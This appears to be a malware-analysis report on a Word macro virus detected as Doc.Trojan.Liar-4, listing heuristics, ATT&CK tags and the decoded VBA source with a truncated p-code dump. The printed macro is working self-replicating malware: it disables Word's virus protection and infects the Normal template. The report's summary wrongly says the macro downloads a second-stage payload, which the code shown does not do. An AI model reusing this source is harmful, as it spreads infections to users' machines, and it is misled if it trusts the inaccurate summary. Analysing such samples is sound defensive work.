MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document containing a VBA macro that is triggered by the Document_Open event. The macro appears to be obfuscated and attempts to download and execute a second-stage payload. The ClamAV detection 'Doc.Trojan.Liar-4' and the presence of a Document_Open macro strongly indicate malicious intent.
Heuristics 3
-
ClamAV: Doc.Trojan.Liar-4 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Liar-4
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8234 bytes |
SHA-256: 87df4beec9a64cff054cee8d401204ba2fa0347eee4ef4c5e5463a2a4fc44f39 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() ' Dim v(200): Options.VirusProtection = (Rnd * 0): Options.SaveNormalPrompt = (Rnd * 0) ' Set a = MacroContainer.VBProject: Set ab = a.VBComponents(1) ' Set abc = ab.CodeModule: Set s = NormalTemplate: t = Chr(39) ' If MacroContainer = s Then Set s = ActiveDocument ' Set nh = s.VBProject.VBComponents(1).CodeModule: li = abc.countoflines: y = 100 + Int(Rnd * 50) ' For i = 1 To li: jc = "": d = Int(Rnd * 3): p = InStr(abc.Lines(i, 1), t) ' If p = 1 And li > y Then ' d = 1: GoTo n_ ' End If ' l = UCase(Left(abc.Lines(i, 1), (p - 1))) ' For o = 1 To Len(l): f = Mid(l, o, 1) ' If Asc(f) < 90 And Asc(f) > 65 Then f = Chr(Asc(f) + Int(Rnd * 2) * 32) ' v(i) = v(i) & f: Next o ' For j = 1 To Int(75 - (Rnd * 20)): jc = jc & Chr(255 - Int(Rnd * 100)): Next j ' v(i) = v(i) & t & jc ' If d = 2 Then v(i) = v(i) & vbCr & t & jc ' vc = vc & v(i) & vbCr ' n_: ' Next i ' If nh.countoflines < (1 + 1 + 2) Then ' nh.deletelines 1, nh.countoflines: nh.addfromstring vc: nh.deletelines nh.countoflines, 1 ' If ActiveDocument.Saved = False Then ActiveDocument.SaveAs ActiveDocument.FullName ' If Day(Now()) = 16 Then beg_to_differ ' End If ' End Sub ' Private Sub beg_to_differ() ' beg = "do you see what I see?" & vbCr ' beg = beg & "do you hear what I hear?" & vbCr ' beg = beg & "do you feel what I feel?" & vbCr ' beg = beg & "do you ever care?" & vbCr ' beg = beg & "I...beg to differ!" & vbCr ' beg = beg & "beg to differ!" & vbCr & vbCr ' beg = beg & "jack twoflower/Lz0/Meta" ' MsgBox beg, 0, "class.beg to differ" ' End Sub ' ' Processing file: /opt/analyzer/scan_staging/d88a2c10132f4bb8b91ae47eefe76b10.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 8520 bytes ' Line #0: ' FuncDefn (Private Sub Document_Open()) ' QuoteRem 0x001C 0x0000 "" ' Line #1: ' Dim ' OptionBase ' LitDI2 0x00C8 ' VarDefn v ' BoS 0x0000 ' Ld Rnd ' LitDI2 0x0000 ' Mul ' Paren ' Ld Options ' MemSt VirusProtection ' BoS 0x0000 ' Ld Rnd ' LitDI2 0x0000 ' Mul ' Paren ' Ld Options ' MemSt SaveNormalPrompt ' QuoteRem 0x0056 0x0000 "" ' Line #2: ' SetStmt ' Ld MacroContainer ' MemLd VBProject ' Set a ' BoS 0x0000 ' SetStmt ' LitDI2 0x0001 ' Ld a ' ArgsMemLd VBComponents 0x0001 ' Set ab ' QuoteRem 0x003D 0x0000 "" ' Line #3: ' SetStmt ' Ld ab ' MemLd CodeModule ' Set abc ' BoS 0x0000 ' SetStmt ' Ld NormalTemplate ' Set s ' BoS 0x0000 ' LitDI2 0x0027 ' ArgsLd Chr 0x0001 ' St t ' QuoteRem 0x003D 0x0000 "" ' Line #4: ' Ld MacroContainer ' Ld s ' Eq ' If ' BoSImplicit ' SetStmt ' Ld ActiveDocument ' Set s ' EndIf ' QuoteRem 0x0032 0x0000 "" ' Line #5: ' SetStmt ' LitDI2 0x0001 ' Ld s ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' Set nh ' BoS 0x0000 ' Ld abc ' MemLd countoflines ' St li ' BoS 0x0000 ' LitDI2 0x0064 ' Ld Rnd ' LitDI2 0x0032 ' Mul ' FnInt ' Add ' St y ' QuoteRem 0x0060 0x0000 "" ' Line #6: ' StartForVariable ' Ld i ' EndForVariable ' LitDI2 0x0001 ' Ld li ' For ' BoS 0x0000 ' LitStr 0x0000 "" ' St jc ' BoS 0x0000 ' Ld Rnd ' LitDI2 0x0003 ' Mul ' FnInt ' St d ' BoS 0x0000 ' Ld i ' LitDI2 0x0001 ' Ld abc ' ArgsMemLd Lines 0x0002 ' Ld t ' FnInStr ' St p ' QuoteRem 0x004A 0x0000 "" ' Line #7: ' Ld p ' LitDI2 0x0001 ' Eq ' Ld li ' Ld y ' Gt ' And ' IfBlock ' QuoteRem 0x0019 0x0000 "" ' Line #8: ' LitDI2 0x0001 ' St d ' BoS 0x0000 ' GoTo n_ ' QuoteRem 0x000F 0x0000 "" ' Line #9: ' EndIfBlock ' QuoteRem 0x0007 0x0000 "" ' Line #10: ' Ld i ' LitDI2 0x0001 ' Ld abc ' ArgsMemLd Lines 0x0002 ' Ld p ' LitDI2 0x0001 ' Sub ' Paren ' ArgsLd LBoun ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.